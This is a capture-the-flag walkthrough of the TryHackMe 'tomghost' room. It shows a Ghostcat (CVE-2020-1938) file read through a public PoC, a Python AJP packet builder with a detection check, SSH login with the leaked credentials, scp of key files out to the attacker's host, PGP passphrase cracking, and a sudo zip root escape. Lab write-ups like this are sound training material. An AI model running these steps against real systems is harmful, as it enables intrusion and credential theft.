TryHackMe | tomghost 打靶记录


https://tryhackme.com/room/tomghost

Nmap scan

# yunki @ yunki in ~/tryHackMe/tomghost [9:54:39] 
$ sudo nmap -sC -sV -O -oA nmap/detail-scan 10.10.171.79                              
[sudo] password for yunki:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 09:56 CST
Nmap scan report for 10.10.171.79
Host is up (0.20s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3c89f0b6ac5fe95540be9e3ba93db7c (RSA)
|   256 dd1a09f59963a3430d2d90d8e3e11fb9 (ECDSA)
|_  256 48d1301b386cc653ea3081805d0cf105 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/3%OT=22%CT=1%CU=41565%PV=Y%DS=2%DC=I%G=Y%TM=642A326C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=4%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=100%GCD=1%ISR=10F%TI=Z%II=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.14 seconds

Exploiting CVE-2020-1938 (Ghostcat)

Googling "8009 Apache Jserv (Protocol v1.3) exploit" points straight at Ghostcat (CVE-2020-1938). Tomcat 9.0.30 is affected (fixed in 9.0.31, 8.5.51 and 7.0.100), and the AJP connector on 8009 is reachable from the network. The bug is that AJP lets the client set request attributes (javax.servlet.include.request_uri, javax.servlet.include.path_info and javax.servlet.include.servlet_path) that Tomcat hands to the DefaultServlet as if a trusted reverse proxy had set them, so an unauthenticated client can read any file under the webapp root, WEB-INF/web.xml included. I used the PoC at https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat and saved the .py file from the repository locally. For comparison, the default server.xml from 9.0.31 onwards ships with the AJP connector commented out, binds it to loopback and requires a shared secret (secretRequired="true"); any one of those would have stopped this.

# yunki @ yunki in ~/tryHackMe/tomghost [10:04:43] 
$ python CVE-2020-1938.py 10.10.171.79 -p 8009 -f WEB-INF/web.xml 
Getting resource at ajp13://10.10.171.79:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>

The <description> element of web.xml gives up a credential, skyfuck:8730281lkjlkjdqlksalks. Try it over SSH.
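To make concrete what the PoC above is doing, here is an added example (mine, not code from the PoC repository or from the room) that encodes the AJP13 Forward Request Ghostcat sends and decodes it again the way a network sensor would. The host, port and /asdf URI mirror the run above; the attribute values and the detection rule are my assumptions about what a legitimate reverse proxy would and would not send. The PoC handles the TCP exchange itself; this block is offline.

```python
"""AJP13 Forward Request encoder/decoder: what the Ghostcat PoC puts on the wire
and the tell a defender can look for. Added example, not the PoC's or the room's
own code; host, port and URI mirror the run above, the rest is assumed."""
import struct

AJP_MAGIC = b"\x12\x34"   # client -> container packet magic
FORWARD_REQUEST = 0x02
METHOD_GET = 2
REQ_ATTRIBUTE = 0x0A      # free-form name/value request attribute
TERMINATOR = 0xFF


def ajp_string(s):
    """2-byte big-endian length, bytes, NUL; None encodes as the 0xFFFF null string."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def ghostcat_attributes(path_info):
    """The include attributes that make DefaultServlet serve a file from the webapp."""
    return {"javax.servlet.include.request_uri": "/",
            "javax.servlet.include.path_info": path_info,
            "javax.servlet.include.servlet_path": "/"}


def build_forward_request(server_name, server_port, req_uri, attributes):
    """Minimal AJP13 Forward Request: GET, no headers, the given attributes."""
    body = bytes([FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1") + ajp_string(req_uri)
    body += ajp_string("127.0.0.1") + ajp_string(None)      # remote_addr, remote_host
    body += ajp_string(server_name) + struct.pack(">H", server_port)
    body += b"\x00" + struct.pack(">H", 0)                    # is_ssl, num_headers
    for name, value in attributes.items():
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([TERMINATOR])
    return AJP_MAGIC + struct.pack(">H", len(body)) + body


def _read_string(buf, pos):
    (n,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if n == 0xFFFF:
        return None, pos
    return buf[pos:pos + n].decode(), pos + n + 1             # +1 skips the NUL


def parse_forward_request(packet):
    """Decode a Forward Request into a dict; raises on anything malformed."""
    if packet[:2] != AJP_MAGIC:
        raise ValueError("not a client->container AJP packet")
    (length,) = struct.unpack_from(">H", packet, 2)
    body = packet[4:4 + length]
    if len(body) != length or body[0] != FORWARD_REQUEST:
        raise ValueError("truncated packet or not a Forward Request")
    out, pos = {"method": body[1]}, 2
    for key in ("protocol", "req_uri", "remote_addr", "remote_host", "server_name"):
        out[key], pos = _read_string(body, pos)
    (out["server_port"],) = struct.unpack_from(">H", body, pos)
    out["is_ssl"] = bool(body[pos + 2])
    (num_headers,) = struct.unpack_from(">H", body, pos + 3)
    pos += 5
    headers = {}
    for _ in range(num_headers):
        if body[pos] == 0xA0:                                 # coded common header name
            name, pos = "sc_req_header_%02x" % body[pos + 1], pos + 2
        else:
            name, pos = _read_string(body, pos)
        headers[name], pos = _read_string(body, pos)
    attrs = {}
    while body[pos] != TERMINATOR:
        code, pos = body[pos], pos + 1
        if code != REQ_ATTRIBUTE:
            raise ValueError("attribute code 0x%02x not handled here" % code)
        name, pos = _read_string(body, pos)
        attrs[name], pos = _read_string(body, pos)
    out.update(headers=headers, attributes=attrs)
    return out


def looks_like_ghostcat(parsed):
    """A reverse proxy never sets servlet include attributes; a client that does is
    asking Tomcat to read a webapp file, which is exactly what CVE-2020-1938 allows."""
    return any(k.startswith("javax.servlet.include.") for k in parsed["attributes"])


if __name__ == "__main__":
    pkt = build_forward_request("10.10.171.79", 8009, "/asdf",
                                ghostcat_attributes("WEB-INF/web.xml"))
    print(pkt.hex())
    print(looks_like_ghostcat(parse_forward_request(pkt)))  # True
```

The decoded packet shows the three javax.servlet.include.* attributes in clear text, so a sensor on AJP traffic that flags any Forward Request carrying them catches this class of request. Tomcat 9.0.31 added allowedRequestAttributesPattern to the AJP connector for the same reason: with no pattern configured, requests carrying arbitrary request attributes are rejected with a 403.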

Initial access

# yunki @ yunki in ~/tryHackMe/tomghost [9:58:34] 
$ ssh skyfuck@10.10.171.79                              
The authenticity of host '10.10.171.79 (10.10.171.79)' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.171.79' (ECDSA) to the list of known hosts.
skyfuck@10.10.171.79's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

skyfuck@ubuntu:~$ 

Privilege escalation

GPG decryption

Running linPEAS.sh turned up two files in skyfuck's home directory: credential.pgp (a PGP-encrypted message) and tryhackme.asc (an exported, passphrase-protected PGP key pair). I copied both to my Kali box with scp.

skyfuck@ubuntu:~$ scp credential.pgp  yunki@10.9.63.59:/home/yunki/tryHackMe/tomghost
yunki@10.9.63.59's password: 
credential.pgp                                                                                                                           100%  394     0.4KB/s   00:00    
skyfuck@ubuntu:~$ scp tryhackme.asc   yunki@10.9.63.59:/home/yunki/tryHackMe/tomghost
yunki@10.9.63.59's password: 
tryhackme.asc
# yunki @ yunki in ~/tryHackMe/tomghost [10:40:14] 
$ gpg2john tryhackme.asc > hash

File tryhackme.asc

# yunki @ yunki in ~/tryHackMe/tomghost [10:40:30] 
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)     
1g 0:00:00:00 DONE (2023-04-03 10:40) 4.347g/s 4660p/s 4660c/s 4660C/s marshall..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

# yunki @ yunki in ~/tryHackMe/tomghost [10:40:48] 
$ gpg -d credential.pgp 
gpg: keybox '/home/yunki/.gnupg/pubring.kbx' created
gpg: encrypted with ELG key, ID 61E104A66184FBCC
gpg: decryption failed: No secret key


# yunki @ yunki in ~/tryHackMe/tomghost [10:41:35] 
$ gpg --import tryhackme.asc 
gpg: directory '/home/yunki/.gnupg' created
gpg: keybox '/home/yunki/.gnupg/pubring.kbx' created
gpg: /home/yunki/.gnupg/trustdb.gpg: trustdb created
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

# yunki @ yunki in ~/tryHackMe/tomghost [10:42:03] 
$ gpg -d credential.pgp     
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

The first gpg -d failed with "No secret key" because the key pair had not been imported yet; after gpg --import, the decrypt prompts (through pinentry) for the key passphrase, and the one john recovered, alexandru, unlocks it. The plaintext is another credential, merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j. Since I already have a shell as skyfuck, I switch user with su rather than opening a new SSH session.

skyfuck@ubuntu:~$ su merlin
Password: 
merlin@ubuntu:/home/skyfuck$ whoami
merlin

Escalating to root

sudo -l shows that merlin can run zip as root. GTFOBins lists a sudo escape for zip: -T tests the archive after it is written, and -TT (long form --unzip-command) replaces the unzip command used for that test with an arbitrary command, which zip runs through the shell with its own (here root) privileges and with the temporary archive name appended. A trailing # in the command comments that appended filename out, leaving a bare interactive sh. An equivalent form is sudo zip createdfile -T --unzip-command="sh -c /bin/bash".

merlin@ubuntu:/home/skyfuck$ 
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# ip a    
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:69:2d:5c:14:a5 brd ff:ff:ff:ff:ff:ff
    inet 10.10.48.225/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::69:2dff:fe5c:14a5/64 scope link 
       valid_lft forever preferred_lft forever
